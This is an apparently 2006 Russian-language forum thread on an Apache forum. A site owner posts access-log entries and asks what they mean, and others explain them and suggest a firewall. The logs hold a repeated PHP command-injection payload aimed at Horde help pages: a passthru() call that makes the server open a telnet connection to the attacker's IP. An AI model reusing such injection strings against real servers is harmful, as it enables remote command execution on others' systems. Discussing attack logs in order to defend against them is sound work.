Попытка взлома в логах

Форум:	Форум PHP	Форум Apache	Форум Регулярные Выражения	Форум MySQL	HTML+CSS+JavaScript	Форум Flash	Разное
Новые темы:	0	0	0	0	0	0	0

Здравствуйте, Посетитель!

вид форума:

тема: Попытка взлома в логах

следующая тема

предыдущая тема

автор: Up1T3R (27.05.2006 в 09:47) письмо автору

213.17.226.130 - - [27/May/2006:08:07:28 +0400] "GET /horde/services/help/?show=about&module=;\".passthru(\"echo%20eof|telnet%20213.17.226.130%205400\");'. HTTP/1.1" 404 296 213.17.226.130 - - [27/May/2006:08:07:28 +0400] "GET /services/help/?show=about&module=;\".passthru(\"echo%20eof|telnet%20213.17.226.130%205400\");'. HTTP/1.1" 404 290 213.17.226.130 - - [27/May/2006:08:07:28 +0400] "GET /webmail/services/help/?show=about&module=;\".passthru(\"echo%20eof|telnet%20213.17.226.130%205400\");'. HTTP/1.1" 404 298 213.17.226.130 - - [27/May/2006:08:07:28 +0400] "GET /email/services/help/?show=about&module=;\".passthru(\"echo%20eof|telnet%20213.17.226.130%205400\");'. HTTP/1.1" 404 296 213.17.226.130 - - [27/May/2006:08:07:29 +0400] "GET /horde2/services/help/?show=about&module=;\".passthru(\"echo%20eof|telnet%20213.17.226.130%205400\");'. HTTP/1.1" 404 297 213.17.226.130 - - [27/May/2006:08:07:29 +0400] "GET /mail/services/help/?show=about&module=;\".passthru(\"echo%20eof|telnet%20213.17.226.130%205400\");'. HTTP/1.1" 404 295 213.17.226.130 - - [27/May/2006:08:07:29 +0400] "GET /mail/horde/services/help/?show=about&module=;\".passthru(\"echo%20eof|telnet%20213.17.226.130%205400\");'. HTTP/1.1" 404 301 213.17.226.130 - - [27/May/2006:08:07:29 +0400] "GET /e-mail/services/help/?show=about&module=;\".passthru(\"echo%20eof|telnet%20213.17.226.130%205400\");'. HTTP/1.1" 404 297 213.17.226.130 - - [27/May/2006:08:07:30 +0400] "GET /correo/services/help/?show=about&module=;\".passthru(\"echo%20eof|telnet%20213.17.226.130%205400\");'. HTTP/1.1" 404 297 213.17.226.130 - - [27/May/2006:08:07:30 +0400] "GET /horde3/services/help/?show=about&module=;\".passthru(\"echo%20eof|telnet%20213.17.226.130%205400\");'. HTTP/1.1" 404 297

как вы думаете что бы это могло значить? в корневой дерективе нету таких папок на сайте нету ссылок на эти папки! чего этим хотел добиться "злоумышленник"?

	автор: cheops (27.05.2006 в 11:13) письмо автору
	для: Up1T3R (27.05.2006 в 09:47)
	Хотел telnet запустить удалённо - это из каких логов: локальная машина, сервер локальной сети или логи с хостинга?

	автор: Up1T3R (27.05.2006 в 23:18) письмо автору
	для: cheops (27.05.2006 в 11:13)
	с хостинга

	автор: cheops (28.05.2006 в 12:05) письмо автору
	для: Up1T3R (27.05.2006 в 23:18)
	Ну тогда беспокоиться нечего, ни на одном нормальном хостинге telnet-а уже давно нет.

	автор: Up1T3R (29.05.2006 в 00:12) письмо автору
	для: cheops (28.05.2006 в 12:05)
	я на своей машине решил поставить сервер :) телнет вырублен это да. но всё таки это попытка взлома? самое интересное что ещё попробовали переполнить буфер через "поисковик по сайту" и методом POST достать какуюто дллку на следующий день логи access стали пустыми (либо я тупанул очистил, либо ...) есть какие либо специфические фаерволы для охраны от хакеров? кроме KAV. или если нет то как осуществляестя защита? (отвечать не обязательно :) ибо опастно)

	автор: cheops (29.05.2006 в 00:43) письмо автору
	для: Up1T3R (29.05.2006 в 00:12)
	Если для Windows, то можно также использовать Outpost.

вверх

Форум Apache